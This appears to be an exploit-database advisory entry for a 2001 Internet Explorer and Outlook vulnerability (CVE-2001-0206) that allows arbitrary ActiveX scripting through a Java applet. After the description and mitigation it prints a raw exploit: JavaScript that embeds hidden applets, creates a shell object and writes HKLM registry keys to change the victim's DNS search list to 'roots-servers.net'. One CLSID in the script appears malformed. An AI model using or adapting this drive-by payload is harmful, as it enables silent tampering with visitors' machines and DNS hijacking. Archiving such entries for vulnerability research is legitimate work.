Microsoft Internet Explorer and Outlook Arbitrary Program Execution Vulnerability

vendor:

Internet Explorer and Outlook

by:

SecurityFocus

7.5

CVSS

HIGH

ActiveX Component Insertion

CWE

Product Name: Internet Explorer and Outlook

Affected Version From: Microsoft Internet Explorer 5.01

Affected Version To: Microsoft Outlook 2000

Patch Exists: YES

Related CWE: CVE-2001-0206

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2001

Microsoft Internet Explorer and Outlook Arbitrary Program Execution Vulnerability

If a malicious website operator were to embed a specially crafted java object into a HTML document, it would be possible to execute arbitrary programs on a target host viewing the webpage through either Microsoft Internet Explorer or Outlook. The com.ms.activeX.ActiveXComponent java object inserted into an <APPLET> tag will allow the creation and scripting of arbitrary ActiveX objects even if they may present security hazards. Even if Outlook has had the 'security update' applied, it is still possible to circumvent the disabling of active script execution through the use of java. Execution of arbitrary programs could make it possible for the malicious website operator to gain rights equivalent to those of the current user.

Mitigation:

Apply the security update provided by Microsoft.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1754/info

If a malicious website operator were to embed a specially crafted java object into a HTML document, it would be possible to execute arbitrary programs on a target host viewing the webpage through either Microsoft Internet Explorer or Outlook. The com.ms.activeX.ActiveXComponent java object inserted into an <APPLET> tag will allow the creation and scripting of arbitrary ActiveX objects even if they may present security hazards.

Even if Outlook has had the 'security update' applied, it is still possible to circumvent the disabling of active script execution through the use of java.

Execution of arbitrary programs could make it possible for the malicious website operator to gain rights equivalent to those of the current user. 

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-89400-0A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>